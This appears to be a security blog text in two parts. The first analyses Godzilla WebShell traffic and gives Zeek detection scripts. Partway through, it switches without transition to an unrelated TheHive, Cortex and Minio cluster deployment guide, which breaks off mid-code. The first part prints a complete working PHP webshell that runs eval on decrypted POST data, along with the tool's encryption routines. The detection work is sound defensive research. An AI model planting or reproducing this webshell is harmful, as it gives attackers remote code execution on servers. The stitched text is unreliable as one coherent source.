
Preface

Godzilla:

image-20211211235918877

Height: 50 meters

Weight: 20,000 tons

Attacks: atomic heat ray, white-hot light, kangaroo kick, throwing, melee, tail whip

A surviving specimen of an intermediate life form, somewhere between a rare marine reptile and a land animal, that lived between the Jurassic and Cretaceous periods and was awakened by hydrogen-bomb tests. It first appeared in the Pacific attacking cargo ships, then came ashore in Tokyo via Odo Island and caused enormous destruction, and was finally killed in Tokyo Bay by Dr. Serizawa's underwater invention, the Oxygen Destroyer.

The rest of this article briefly explains how to capture the monster: first send a large fleet of helicopters to Skull Island to abduct another enormous but far gentler beast, King Kong; then let Kong tank the damage while the humans sneak in the finishing blow. The end!

image-20211211235918877

I really can't keep this up; time to get serious...


Godzilla is a capable WebShell management tool. According to its own documentation, its selling points are:

  • Every type of shell it generates evades all mainstream static detection

  • Its encrypted traffic bypasses all mainstream traffic-inspection WAFs

  • Its built-in plugins go far beyond what Behinder (冰蝎) or AntSword (蚁剑) offer

Zeek (formerly Bro) is an open-source network traffic analyzer. Many operators use Zeek as a Network Security Monitor (NSM) to support investigations of suspicious or malicious activity. Zeek also supports a wide range of traffic-analysis tasks beyond security, including performance measurement and troubleshooting. Its highlights:

  • In-depth analysis: Zeek ships with analyzers for many protocols, enabling high-level semantic analysis at the application layer.

  • Adaptable and flexible: Zeek's domain-specific scripting language allows site-specific monitoring policies, so it is not tied to any single detection approach.

  • Efficient: Zeek targets high-performance networks and runs operationally at a variety of large sites.

  • Highly stateful: Zeek keeps extensive application-layer state about the network it monitors and provides a high-level archive of network activity.

Environment

  • Godzilla: v4.0.1
  • Zeek:v4.1.0
  • WebShell:
    • PHP XOR BASE64
    • JSP AES BASE64

Source Code Analysis

PHP XOR BASE64

Client

  • Basic configuration: URL, password, key, encryptor and so on, as shown below:
    • Password: as with AntSword or China Chopper, the password is the name of the POST parameter. In this example the password is Happy, so every request Godzilla sends has the form Happy=XXX. Referred to below as pass.
    • Key: used to encrypt the request data. The key is not used directly; instead its MD5 is computed and the first 16 characters of that digest are used as the actual encryption key. Referred to below as key.
    • Payload: generates the WebShell of the corresponding type
    • Encryptor: controls how the WebShell traffic is encrypted
    • Request configuration: mainly for customizing HTTP request headers and for adding extra junk data before and after the real request body, further diluting the traffic's identifiable characteristics

image-20211130173607606

  • Since the Godzilla author did not obfuscate the client, the source code is easily recovered with jadx.

    For the PHP XOR BASE64 encryptor, a 16-character check string is attached to both the beginning and the end of each response: the two halves of the MD5 of pass + key.
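
To make these two derivations concrete, here is a minimal Python sketch of them (my own illustration, not Godzilla code; for the JSP variant described later, the two markers are additionally upper-cased):

import hashlib

def derive_key(secret: str) -> str:
    # Godzilla uses the first 16 hex characters of md5(secret) as its working key
    return hashlib.md5(secret.encode()).hexdigest()[:16]

def response_markers(password: str, derived_key: str):
    # md5(pass + key) split into a 16-character left and right check string
    digest = hashlib.md5((password + derived_key).encode()).hexdigest()
    return digest[:16], digest[16:]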

public class PhpXor implements Cryption {
public void init(ShellEntity context) {
this.shell = context;
this.http = this.shell.getHttp();
this.key = this.shell.getSecretKeyX().getBytes();
this.pass = this.shell.getPassword();
String findStrMd5 = functions.md5(this.pass + new String(this.key)); // check string: md5(pass + key)
this.findStrLeft = findStrMd5.substring(0, 16); // first 16 chars of the MD5
this.findStrRight = findStrMd5.substring(16); // last 16 chars of the MD5
}
  • Request encryption
    • The plaintext is XORed byte-by-byte with key, then Base64-encoded, then URL-encoded;
  public byte[] encode(byte[] data) {
try {
return E(data);
} catch (Exception e) {
Log.error(e);
return null;
}
}

// XOR each byte with the key
public byte[] E(byte[] cs) {
int len = cs.length;
for (int i = 0; i < len; i++) {
cs[i] = (byte) (cs[i] ^ this.key[(i + 1) & 15]);
}
return (this.pass + "=" + URLEncoder.encode(functions.base64EncodeToString(cs))).getBytes();
}
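
For readers building detection or replay tooling, a rough Python equivalent of E() above might look like this (my own sketch; URL-encoding details may differ slightly from Java's URLEncoder):

import base64
from urllib.parse import quote_plus

def php_xor_encode(plaintext: bytes, derived_key: bytes, password: str) -> bytes:
    # XOR with key[(i+1) & 15], then Base64, then URL-encode, prefixed with "pass="
    xored = bytes(b ^ derived_key[(i + 1) & 15] for i, b in enumerate(plaintext))
    return (password + "=" + quote_plus(base64.b64encode(xored).decode())).encode()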
  • Response decryption

    • findStr first strips the leading and trailing 16-character check strings from the response data;

    • the remaining string is Base64-decoded with base64Decode;

    • and finally XORed with key to recover the plaintext;

public byte[] decode(byte[] data) {
if (data == null || data.length <= 0) {
return data;
}
try {
return D(findStr(data));
} catch (Exception e) {
Log.error(e);
return null;
}
}

public byte[] D(String data) {
byte[] cs = functions.base64Decode(data);
int len = cs.length;
for (int i = 0; i < len; i++) {
cs[i] = (byte) (cs[i] ^ this.key[(i + 1) & 15]);
}
return cs;
}

public String findStr(byte[] respResult) {
return functions.subMiddleStr(new String(respResult), this.findStrLeft, this.findStrRight);
}
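
The reverse direction, useful for decrypting captured responses offline, could be sketched in Python as follows (an assumption of this sketch: the body is exactly marker + Base64 + marker; Godzilla's findStr instead searches for the two markers, which also copes with extra junk around them):

import base64

def php_xor_decode(resp_body: bytes, derived_key: bytes) -> bytes:
    inner = base64.b64decode(resp_body[16:-16])  # strip the two 16-byte check strings
    return bytes(b ^ derived_key[(i + 1) & 15] for i, b in enumerate(inner))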

Sample data - decryption

![image-20211201143236656](./Zeek-Detect-Godzilla-WebShell/示例数据 - 1.png)

Server side

The server-side code of the PHP XOR BASE64 shell is shown below. It defines an encode function used to encrypt and decrypt the request data; because the cipher is a byte-wise XOR, the same function works in both directions. The shell's basic flow is: when the server receives Godzilla's first request, no session exists yet, so the decrypted POST data (the PHP function definitions required by the shell's features) is stored in the session. From then on, Godzilla only submits the name of the function for a given operation (for example, getFile to list a directory) plus its parameters, so subsequent operations do not need to resend a large request body.

<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
for($i=0;$i<strlen($D);$i++) {
$c = $K[$i+1&15];
$D[$i] = $D[$i]^$c;
}
return $D;
}
$pass='Happy';
$payloadName='payload';
$key='bdf2e45b317c4585';
if (isset($_POST[$pass])){
$data=encode(base64_decode($_POST[$pass]),$key);
if (isset($_SESSION[$payloadName])){
$payload=encode($_SESSION[$payloadName],$key);
if (strpos($payload,"getBasicsInfo")===false){
$payload=encode($payload,$key);
}
eval($payload);
echo substr(md5($pass.$key),0,16);
echo base64_encode(encode(@run($data),$key));
echo substr(md5($pass.$key),16);
}else{
if (strpos($data,"getBasicsInfo")!==false){
$_SESSION[$payloadName]=encode($data,$key);
}
}
}
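
Because XOR with a fixed key is its own inverse, applying encode twice returns the original data, which is why one function serves both directions. A quick Python check of that property (illustrative only, using the derived key from the sample shell above):

key = b"bdf2e45b317c4585"  # the derived key from the sample shell above
xor = lambda data: bytes(b ^ key[(i + 1) & 15] for i, b in enumerate(data))
assert xor(xor(b"getBasicsInfo")) == b"getBasicsInfo"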

JSP AES BASE64

The JSP WebShell uses AES instead. The AES key is derived in the same way: the MD5 of the configured secret is computed and its first 16 characters are used as the key. For a deeper analysis see 【原创】哥斯拉Godzilla加密流量分析; it is not the focus of this article.

public void init(ShellEntity context) {
this.shell = context;
this.http = this.shell.getHttp();
this.key = this.shell.getSecretKeyX();
this.pass = this.shell.getPassword();
String findStrMd5 = functions.md5(this.pass + this.key);
this.findStrLeft = findStrMd5.substring(0, 16).toUpperCase();
this.findStrRight = findStrMd5.substring(16).toUpperCase();
try {
this.encodeCipher = Cipher.getInstance("AES");
this.decodeCipher = Cipher.getInstance("AES");
this.encodeCipher.init(1, new SecretKeySpec(this.key.getBytes(), "AES"));
this.decodeCipher.init(2, new SecretKeySpec(this.key.getBytes(), "AES"));
this.payload = this.shell.getPayloadModule().getPayload();
if (this.payload != null) {
this.http.sendHttpResponse(this.payload);
this.state = true;
} else {
Log.error("payload Is Null");
}
} catch (Exception e) {
Log.error(e);
}
}

public byte[] encode(byte[] data) {
try {
return (this.pass + "=" + URLEncoder.encode(functions.base64EncodeToString(this.encodeCipher.doFinal(data)))).getBytes();
} catch (Exception e) {
Log.error(e);
return null;
}
}

public byte[] decode(byte[] data) {
try {
return this.decodeCipher.doFinal(functions.base64Decode(findStr(data)));
} catch (Exception e) {
Log.error(e);
return null;
}
}
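
As an aside for offline analysis, decrypting a captured JSP response in Python might look roughly like the sketch below. It assumes the common JVM default behind Cipher.getInstance("AES"), i.e. ECB mode with PKCS#5 padding, and uses the pycryptodome package; treat both as assumptions to verify, not guarantees.

import base64
from Crypto.Cipher import AES  # pycryptodome

def jsp_aes_decode(resp_body: bytes, derived_key: bytes) -> bytes:
    inner = base64.b64decode(resp_body[16:-16])   # strip the upper-cased md5(pass+key) markers
    plain = AES.new(derived_key, AES.MODE_ECB).decrypt(inner)
    return plain[:-plain[-1]]                     # drop PKCS#5/#7 padding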

Feature Extraction

Given the analysis above, traditional static signature matching is no longer suitable for detecting the Godzilla WebShell. We can, however, combine several features into a detection model for the Godzilla PHP XOR BASE64 WebShell. The features are as follows:

  1. Frequency

    When Godzilla first connects to a WebShell, it issues three HTTP POST requests within a single TCP session.

    image-20211206111919028

    Note that the uid is CbhiAefsstFeAyCM6 for all three requests, i.e. they belong to the same TCP session.

    image-20211206114412112

  2. Length

    Although Godzilla encrypts the payload in transit, the content of the three initial requests is fixed, so the length after XOR + BASE64 encoding is constant.

    • First request length (Value): 52216

      Godzilla loads the contents of payload.php as its payload data, which defines the set of PHP functions the shell's features need. On the first connection these function definitions are sent to the server and stored in the session, so later shell operations only need to send a function name and its arguments.

    image-20211204004016084

    • First response length: 0

      image-20211204005107879

    • Second request length (Value): 28

      • Ciphertext: CQNGDVtRLFJcUmEwNTg1FgEVRg==
      • Plaintext: {'methodName': 'test'}

      image-20211204010342657

    • Second response length: 64

      • Ciphertext: e+06ZTQ1YjMxNKj7Mzhyv7gfMGU0NQ==
      • Plaintext: ok

      image-20211204011821599

    • Third request length (Value): 40

      • Ciphertext: CQNGDVtRLFJcUmE5NTg1BQEScARHXAFAeFkFWw==
      • Plaintext: {'methodName': 'getBasicsInfo'}

      image-20211204012318391

      Note: the third response packet cannot be used as a feature, because each server's basic system information differs, so the response length varies.

  3. Content

    You might wonder what can still be judged from the content once everything is encrypted. There is something, it just isn't a traditional "threat signature":

    • Requests: the parameter name (pass) is identical in all three requests; in this example it is Happy

    image-20211206111328799

    • Responses: the first and last 16 characters of the response body match the MD5-fragment pattern [a-z0-9]{16}.+[a-z0-9]{16}, and those 16-character values are identical across the two responses (a quick check for this is sketched after the screenshots below)

    image-20211206105322612

    image-20211206110509962
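
As a quick illustration of the content feature above (my own sketch, separate from the Zeek model below): extract the 16-character prefix and suffix of each response body, check that they look like MD5 fragments, and compare them across the responses.

import re

FRAGMENT = re.compile(rb"^[a-z0-9]{16}$")

def extract_markers(resp_body: bytes):
    left, right = resp_body[:16], resp_body[-16:]
    if FRAGMENT.match(left) and FRAGMENT.match(right):
        return left, right   # should be identical across the 2nd and 3rd responses
    return None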

Detection Model

image-20211208151817057

PHP XOR BASE64

@load base/frameworks/sumstats

redef enum Notice::Type +=
{
WebShell_Godzilla_PHP_XOR_BASE64
};

## Measure HTTP requests with the Summary Statistics framework.
event http_message_done(c: connection, is_orig: bool, stat: http_message_stat)
{
if ( (c?$http) && (c$http?$status_code) && (c$http?$method) && (c$http?$client_body) )
{
if ( (c$http$status_code) == 200 && (c$http$method == "POST") )
{
local key_str: string = c$http$uid + "#####" + cat(c$id$orig_h) + "#####" + cat(c$id$orig_p) + "#####" + cat(c$id$resp_h)+ "#####" + cat(c$id$resp_p) + "#####" + c$http$uri;
local observe_str: string = cat(c$http$ts) + "#####" + c$http$client_body + "#####" + c$http$server_body + "#####" + cat(c$http$request_body_len);
## Step 1: create an observation and add the data to it.
SumStats::observe("godzilla_php_xor_base64_webshell_event", [$str=key_str], [$str=observe_str]);
}
}
}

event zeek_init()
{
## Step 2: reduce the named observation stream; here we collect unique values.
local r1 = SumStats::Reducer($stream = "godzilla_php_xor_base64_webshell_event", $apply = set(SumStats::UNIQUE));
## Step 3: create the summary statistic for final processing. Example: when the threshold of 3 is crossed within a 3-second epoch, the logic below runs;
SumStats::create([$name = "godzilla_php_xor_base64_webshell_event.unique",
$epoch = 3sec,
$reducers = set(r1),
$threshold = 3.0,
$threshold_val(key: SumStats::Key, result: SumStats::Result) =
{
return result["godzilla_php_xor_base64_webshell_event"]$num + 0.0;
},
$threshold_crossed(key: SumStats::Key, result: SumStats::Result) =
{
if ( result["godzilla_php_xor_base64_webshell_event"]$unique == 3 )
{
local sig1: bool = F;
local sig2: bool = F;
local sig3: bool = F;
local pass_str_set: set[string];
local md5_str_set: set[string];
local key_str_vector: vector of string = split_string(key$str, /#####/);

for ( value in result["godzilla_php_xor_base64_webshell_event"]$unique_vals )
{
local observe_str_vector: vector of string = split_string(value$str, /#####/);
local client_body = unescape_URI(observe_str_vector[1]);
local server_body = unescape_URI(observe_str_vector[2]);
local client_body_len = to_int(observe_str_vector[3]);
local offset = strstr(client_body, "=");
local client_body_value = client_body[offset: |client_body|];

## 获取请求参数
if (offset > 1)
## 本例中: Happy=CQNGDVtRLFJcUmEwNTg1FgEVRg%3D%3D
add pass_str_set[client_body[0: offset-1]];

## 响应体长度 > 0,提取首位各16字节并检查是否满足MD5格式
if (|server_body| > 0)
{
## 本例中: 52f0f23a94a8a3f0e+06ZTQ1YjMxNKj7Mzhyv7gfMGU0NQ==468e329e21eb39e8
local server_body_str = server_body[0: 16] + server_body[-16: ];
local server_body_md5 = find_all_ordered(server_body_str, /[a-zA-Z0-9]{32}/);
if (|server_body_md5| == 0)
return;
add md5_str_set[server_body_str];
}

## 请求体长度 > 52216 && 响应体长度 = 0
if ( (client_body_len > 52216) && (|server_body| == 0) )
sig1 = T;

## 请求体长度 = 28 && 响应体长度 = 64
if ( (|client_body_value| == 28) && (|server_body| == 64) )
sig2 = T;

## 请求体长度 = 40
if ( |client_body_value| == 40 )
sig3 = T;
}

if ( sig1 && sig2 && sig3 )
{
## check that the request parameter name is identical across the 3 requests
## check that the MD5 markers extracted from the last 2 responses are identical
if ( (|pass_str_set| == 1) && (|md5_str_set| == 1) )
{
NOTICE([
$note=WebShell_Godzilla_PHP_XOR_BASE64,
$uid=key_str_vector[0],
$src=to_addr(key_str_vector[1]),
$dst=to_addr(key_str_vector[3]),
$msg=fmt("[+] Godzilla(PHP_XOR_BASE64) traffic Detected, %s:%s -> %s:%s, WebShell URI: %s", key_str_vector[1], key_str_vector[2], key_str_vector[3], key_str_vector[4], key_str_vector[5]),
$sub=cat("Godzilla traffic Detected")
]);
}
}
}
}
]);
}

JSP AES BASE64

@load base/frameworks/sumstats

redef enum Notice::Type +=
{
WebShell_Godzilla_JSP_AES_BASE64
};

event http_message_done(c: connection, is_orig: bool, stat: http_message_stat)
{
if ( c?$http && c$http?$status_code && c$http?$method )
{
if ( (c$http$status_code) == 200 && (c$http$method == "POST") && (c$http?$client_body) )
{
local key_str: string = c$http$uid + "#####" + cat(c$id$orig_h) + "#####" + cat(c$id$orig_p) + "#####" + cat(c$id$resp_h)+ "#####" + cat(c$id$resp_p) + "#####" + c$http$uri;
local observe_str: string = cat(c$http$ts) + "#####" + c$http$client_body + "#####" + c$http$server_body + "#####" + cat(c$http$request_body_len);
SumStats::observe("godzilla_jsp_aes_base64_webshell_event", [$str=key_str], [$str=observe_str]);
}
}
}

event zeek_init()
{
local r1 = SumStats::Reducer($stream = "godzilla_jsp_aes_base64_webshell_event", $apply = set(SumStats::UNIQUE));
SumStats::create([$name = "godzilla_jsp_aes_base64_webshell_event.unique",
$epoch = 5sec,
$reducers = set(r1),
$threshold = 3.0,
$threshold_val(key: SumStats::Key, result: SumStats::Result) =
{
return result["godzilla_jsp_aes_base64_webshell_event"]$num + 0.0;
},
$threshold_crossed(key: SumStats::Key, result: SumStats::Result) =
{
if ( result["godzilla_jsp_aes_base64_webshell_event"]$unique == 3 )
{
local sig1: bool = F;
local sig2: bool = F;
local sig3: bool = F;
local pass_str_set: set[string];
local md5_str_set: set[string];
local key_str_vector: vector of string = split_string(key$str, /#####/);

for ( value in result["godzilla_jsp_aes_base64_webshell_event"]$unique_vals )
{
local observe_str_vector: vector of string = split_string(value$str, /#####/);
local client_body = unescape_URI(observe_str_vector[1]);
local server_body = unescape_URI(observe_str_vector[2]);
local client_body_len = to_int(observe_str_vector[3]);
local offset = strstr(client_body, "=");
local client_body_value = client_body[offset: |client_body|];

## 获取 WebShell Password Key
if (offset > 1)
add pass_str_set[client_body[0: offset-1]];

if (|server_body| > 0)
{
local server_body_str = server_body[0: 16] + server_body[-16: ];
local server_body_md5 = find_last(server_body_str, /[a-zA-Z0-9]{32}/);
add md5_str_set[server_body_md5];
}

## 请求体长度 > 48500 && 响应体长度 = 0
if ( (client_body_len > 48500) && (|server_body| == 0) )
sig1 = T;

## 请求体长度 = 64 && 响应体长度 = 76
if ( (|client_body_value| == 64) && (|server_body| == 76) && (server_body_str == server_body_md5) )
sig2 = T;

## 请求体长度 = 88
if ( |client_body_value| == 88 && (server_body_str == server_body_md5) )
sig3 = T;
}

## check that the password key is identical across the 3 request bodies, and that the MD5 markers extracted from the 2nd and 3rd responses are identical
if ( (|pass_str_set| == 1) && (|md5_str_set| == 1) )
if ( sig1 && sig2 && sig3 )
{
NOTICE([
$note=WebShell_Godzilla_JSP_AES_BASE64,
$uid=key_str_vector[0],
$src=to_addr(key_str_vector[1]),
$dst=to_addr(key_str_vector[3]),
$msg=fmt("[+] Godzilla(JSP_AES_BASE64) traffic Detected, %s:%s -> %s:%s, WebShell URI: %s", key_str_vector[1], key_str_vector[2], key_str_vector[3], key_str_vector[4], key_str_vector[5]),
$sub=cat("Godzilla traffic Detected")
]);
}
}
}
]);
}

Model Validation

Godzilla v4 Detected

# Installing from GIT
$ git clone https://github.com/ntop/PF_RING.git

# Kernel Module Installation
$ cd /opt/PF_RING/kernel
$ make
$ sudo make install

# Running PF_RING
$ cd PF_RING/kernel
$ sudo insmod pf_ring.ko min_num_slots=65536 enable_tx_capture=0
# sudo insmod ./pf_ring.ko [min_num_slots=N] [enable_tx_capture=1|0] [ enable_ip_defrag=1|0]

# Drivers
$ ethtool -i eth1 | grep driver
driver: ixgbe

# Libpfring and Libpcap Installation
$ cd PF_RING/userland/lib
$ ./configure && make
$ sudo make install
$ cd ../libpcap
$ ./configure && make
$ sudo make install

# Application Examples
$ cd PF_RING/userland/examples
$ make
$ sudo ./pfcount -i zc:eth1
$ sudo ./pfsend -f 64byte_packets.pcap -n 0 -i zc:eth1 -r 5
$ git clone --recursive https://github.com/zeek/zeek
$ ./configure --with-pcap=/opt/PF_RING --enable-jemalloc
$ make -j4
$ sudo make install

Background

As enterprise security programs mature, security work moves into the Happy (read: exhausting) operations phase. Security operations inevitably involves incident response, which often requires cross-department collaboration, and some incidents need sustained tracking and investigation. Recording every step of a response is therefore essential: afterwards it lets us fold the lessons learned back into our overall security capability, and from an automation perspective it pushes us to turn response processes into reusable Playbooks so that we can react to attacks faster and shorten the time from compromise to containment.

Here are my pain points, or rather the problems we need to solve in day-to-day operations:

  • How do we record the time each response step takes? Those task durations directly feed our later MTTD/MTTR calculations.
  • How do we distill Playbooks from incidents? For anything repeatable and process-driven, automation is the only sensible answer.
  • Facing ever more creative attack techniques, how do we give analysts more customizable plugins to make analysis more efficient?
  • How do we integrate quickly with the security devices we already have and stop the bleeding in time?
  • Incidents usually involve several departments; how do we analyze them quickly and keep the collaborating teams updated on progress?

Security Incident Response Platform - TheHive

I eventually chose the TheHive incident response platform to support daily security operations. Unlike SIEM-class products, TheHive deals with events that actually need to be responded to. A rough summary of its strengths:

  • Collaboration: TheHive treats an incident as a Case and encourages multi-person, cross-department collaboration; its sharing mechanism keeps partner teams up to date on progress.
  • Cost measurement: TheHive records the time spent on every Case and Task, which helps us measure MTTD and MTTR and gives us a basis for improving those metrics later.
  • Fast response: during response you need to analyze the data at hand and roll out remediation quickly to stop the attack. TheHive's Cortex component supports rapid analysis and can automatically push confirmed IoCs to existing security devices, integrating with the SIEM, WAF, firewall and EDR.
  • Efficiency: repeatable response processes should be automated, which requires a library of Playbooks. Where do Playbooks come from? We use TheHive to record every incident response, splitting the collaboration items and response steps into Tasks, and accumulate Playbooks that way.

TheHive Cluster Deployment

For reasons of space, this section mainly covers the configuration changes needed when running TheHive as a cluster. For installing TheHive itself, see the Step-by-Step guide; for a quick test you can simply use the official Docker or VM images.

According to the official documentation, a TheHive cluster involves four components. Below are the adjustments needed for TheHive, Cortex, Cassandra and Minio respectively.

TheHive

Treat node 1 as the primary node and configure the akka component by editing /etc/thehive/application.conf, as follows:

## Akka server
akka {
cluster.enable = on
actor {
provider = cluster
}
remote.artery {
canonical {
hostname = "<My IP address>"
port = 2551
}
}
# seed node list contains at least one active node
cluster.seed-nodes = [
"akka://application@<Node 1 IP address>:2551",
"akka://application@<Node 2 IP address>:2551",
"akka://application@<Node 3 IP address>:2551"
]
}

Cassandra

  • Cluster configuration

    • Update the configuration file /etc/cassandra/cassandra.yaml with the following parameters:
    cluster_name: 'thp'
    num_tokens: 256
    authenticator: PasswordAuthenticator
    authorizer: CassandraAuthorizer
    role_manager: CassandraRoleManager
    data_file_directories:
    - /var/lib/cassandra/data
    commitlog_directory: /var/lib/cassandra/commitlog
    saved_caches_directory: /var/lib/cassandra/saved_caches
    seed_provider:
    - class_name: org.apache.cassandra.locator.SimpleSeedProvider
    parameters:
    - seeds: "<ip node 1>, <ip node 2>, <ip node 3>"
    listen_interface : ens160 # interface to listen on
    rpc_interface: ens160 # interface to listen on
    endpoint_snitch: SimpleSnitch
    • Delete the file /etc/cassandra/cassandra-topology.properties
    $ rm -rf /etc/cassandra/cassandra-topology.properties
  • Start the service

    • Start the service on every node
    $ service cassandra start
    • Check the cluster status
    $ nodetool status
    Datacenter: datacenter1
    =======================
    Status=Up/Down
    |/ State=Normal/Leaving/Joining/Moving
    -- Address Load Tokens Owns (effective) Host ID Rack
    UN 192.168.199.35 449.33 KiB 256 100.0% 72e95db1-9c37-4a53-9312-76bd0b2e6ca7 rack1
    UN 192.168.199.36 631.65 KiB 256 100.0% 4051f9d4-91de-43e5-9a4a-c3da46417830 rack1
    UN 192.168.199.37 437.13 KiB 256 100.0% 8844626f-04c0-4dd3-855e-088935b8dc65 rack1
  • Initialize the database

    • Change the default database password (default account/password: cassandra/cassandra)
    $ cqlsh th01 -u cassandra
    cassandra@cqlsh> ALTER USER cassandra WITH PASSWORD 'HelloWorld';
    cassandra@cqlsh> quit;
    • Make sure the user accounts are consistent on all nodes
    $ cqlsh <ip node X> -u cassandra
    cassandra@cqlsh> ALTER KEYSPACE system_auth WITH replication = {'class': 'SimpleStrategy', 'replication_factor': 3 };
    • Create a KEYSPACE named thehive
    cassandra@cqlsh> CREATE KEYSPACE thehive WITH replication = {'class': 'SimpleStrategy', 'replication_factor': '3' } AND durable_writes = 'true';
    • Create the thehive role and grant it permissions on the thehive keyspace (choose a password)
    cassandra@cqlsh> CREATE ROLE thehive WITH LOGIN = true AND PASSWORD = 'HelloWorld';
    cassandra@cqlsh> GRANT ALL PERMISSIONS ON KEYSPACE thehive TO 'thehive';
  • TheHive configuration

    Recent TheHive cluster setups require Elasticsearch for indexing, so the following configuration needs to be updated as well:

    • Update /etc/thehive/application.conf
    db.janusgraph {
    storage {
    ## Cassandra configuration
    backend: cql
    hostname: ["<ip node 1>", "<ip node 2>", "<ip node 3>"]
    username: "cassandra"
    password: "HelloWorld"
    cql {
    cluster-name: thp
    keyspace: thehive
    }
    }

    ## Index configuration
    index.search {
    backend: elasticsearch
    hostname: ["<es node 1>", "es node 2", "es node 3"]
    index-name: thehive
    # auth
    elasticsearch.http.auth.type=basic
    elasticsearch.http.auth.basic.username=elastic
    elasticsearch.http.auth.basic.password=HelloWorld
    # ssl
    elasticsearch.ssl.enabled=true
    elasticsearch.ssl.truststore.location=/etc/thehive/truststore.jks
    elasticsearch.ssl.truststore.password=HelloWorld
    }
    }

Minio

I use Minio for file storage, so it needs to be configured here; an even simpler option is to use S3 directly.

  • Create the directory
$ mkdir /opt/minio
  • Create the user
$ adduser minio
  • Create the data volumes

    Create at least two data volumes on each server

$ mkdir -p /srv/minio/{1,2}
$ chown -R minio:minio /srv/minio
  • Update hostnames
$ vim /etc/hosts
192.168.199.35 minio1
192.168.199.36 minio2
192.168.199.37 minio3
  • Install
$ cd /opt/minio
$ mkdir /opt/minio/{bin,etc}
$ wget -O /opt/minio/bin/minio https://dl.minio.io/server/minio/release/linux-amd64/minio
$ chown -R minio:minio /opt/minio
  • Configure

    • Create the configuration file /opt/minio/etc/minio.conf
    MINIO_OPTS="server --address :9100 http://minio{1...3}/srv/minio/{1...2}"
    MINIO_ACCESS_KEY="admin"
    MINIO_SECRET_KEY="HelloWorld"
    • Create the systemd unit file /usr/lib/systemd/system/minio.service
    [Unit]
    Description=minio
    Documentation=https://docs.min.io
    Wants=network-online.target
    After=network-online.target
    AssertFileIsExecutable=/opt/minio/bin/minio

    [Service]
    WorkingDirectory=/opt/minio
    User=minio
    Group=minio
    EnvironmentFile=/opt/minio/etc/minio.conf
    ExecStart=/opt/minio/bin/minio $MINIO_OPTS
    Restart=always
    LimitNOFILE=65536
    TimeoutStopSec=0
    SendSIGKILL=no

    [Install]
    WantedBy=multi-user.target
  • Start

$ systemctl daemon-reload
$ systemctl enable minio
$ systemctl start minio.service

Note: double-check file permissions here; if they are wrong, the process will not start.

  • Create the bucket

    Minio-1

    • Create the bucket

    Minio-2

  • Update the TheHive configuration file /etc/thehive/application.conf

## Attachment storage configuration
storage {
provider: s3
s3 {
bucket = "thehive"
readTimeout = 1 minute
writeTimeout = 1 minute
chunkSize = 1 MB
endpoint = "http://minio1:9100"
accessKey = "admin"
secretKey = "HelloWorld"
region = "us-east-1"
}
}
alpakka.s3.path-style-access = force

Cortex

  • Edit the Cortex configuration file /etc/cortex/application.conf

    Note that the official default configuration has a small issue: when Elastic authentication is enabled, the username key must be renamed to user, otherwise an error is raised.

play.http.secret.key="QZUm2UgZYXF6axC"
search {
index = cortex
uri = "https://elasticsearch01:9200,elasticsearch02:9200,elasticsearch03:9200"
user = "elastic" # note: "user", not "username"
password = "HelloWorld"
keyStore {
path = "/etc/cortex/truststore.jks"
password = "HelloWorld"
}
trustStore {
path = "/etc/cortex/truststore.jks"
password = "HelloWorld"
}
}

Analyzers and Responders

Cortex 3 added support for dockerized analyzers, which greatly simplifies installation: we no longer have to wrestle with Python or other library dependencies when installing plugins.

  • Install Docker
# Ubuntu 18.04
$ wget -O- https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -
$ add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu bionic stable"
$ sudo apt-get update
$ sudo apt-get install docker-ce
  • Allow the cortex account to run Docker
$ usermod -a -G docker cortex
  • Update the configuration file /etc/cortex/application.conf to enable analyzers.json
## ANALYZERS
#
analyzer {
urls = [
"https://download.thehive-project.org/analyzers.json" # 本次新增
"/etc/cortex/Cortex-Analyzers/analyzers"
]
}

# RESPONDERS
#
responder {
urls = [
"https://download.thehive-project.org/responders.json" # 本次新增
"/etc/cortex/Cortex-Analyzers/responders"
]
}

How to Create a Plugin

As mentioned above, the Cortex component already ships with a rich set of Analyzers and Responders that let operators analyze and respond to incidents quickly. In practice, different scenarios still call for some custom plugins. The official documentation explains plugin development in detail: How to Write and Submit an Analyzer. Some of the plugins we added are included below.

Enough talk, show me the code!

Analyzer Plugins

ThreatBook (微步在线)

We have a commercial ThreatBook threat-intelligence subscription, so we integrated it with TheHive as well.

  • threatbook.py
#!/usr/bin/env python3
# encoding: utf-8

import requests


class ThreatBookError(Exception):
def __init__(self, message):
Exception.__init__(self, message)
self.message = message


class ThreatBook():
"""
Threat intelligence: Threat Book
https://x.threatbook.cn/nodev4/vb4/API
"""

def __init__(self, key):
self.key = key
self.ua = "HappyHunting"
self.session = requests.Session()
self.urls = {
'compromise': 'https://api.threatbook.cn/v3/scene/dns',
'reputation': 'https://api.threatbook.cn/v3/scene/ip_reputation'
}

def _request(self, url, params={}):
"""
Request an url
"""
headers = {'User-Agent': self.ua}
r = self.session.get(
url=url,
params=params,
headers=headers
)

'''
{
"response_code": -1,
"verbose_msg": "Invalid Access IP"
}
'''
if r.status_code != 200:
raise ThreatBookError(
'Invalid HTTP status code %i' % r.status_code)
if r.json()['response_code'] != 0:
raise ThreatBookError(r.json())
return r.json()

def parser_results(self, results):
for k, v in results.items():
intel = {
'ioc': k,
'malicious': v['is_malicious'],
'confidence': v['confidence_level'],
'tags': v['judgments']
}
return intel

def get_reputation(self, ioc):
"""Getting reputation IP"""
url = self.urls['reputation']
params = {
'apikey': self.key,
'resource': ioc
}
results = self._request(url=url, params=params)
return self.parser_results(results['data'])

def get_compromise(self, ioc):
"""Getting compromise IoC"""
url = self.urls['compromise']
params = {
'apikey': self.key,
'resource': ioc
}
results = self._request(url=url, params=params)
return self.parser_results(list(results['data'].values())[0])


if __name__ == '__main__':
key = '<api_key>'
threat = ThreatBook(key)
# reputation
ioc = '8.8.8.8'
r = threat.get_reputation(ioc)
# compromise
ioc = 'zzv.no-ip.info'
r = threat.get_compromise(ioc)
print(r)
  • threatbook_analyzer.py
#!/usr/bin/env python3
# encoding: utf-8

from threatbook import ThreatBook
from cortexutils.analyzer import Analyzer


class ThreatBookAnalyzer(Analyzer):

def __init__(self):
Analyzer.__init__(self)
self.service = self.get_param(
'config.service', None, 'Service parameter is missing')
self.key = self.get_param(
'config.key', None, 'Missing ThreatBook API key')
self.polling_interval = self.get_param('config.polling_interval', 1)
self.threatbook = ThreatBook(self.key)

def summary(self, raw):
taxonomies = []
level = "info"
namespace = "ThreatBook"
value = "False"

if self.service == 'reputation':
predicate = 'Reputation'
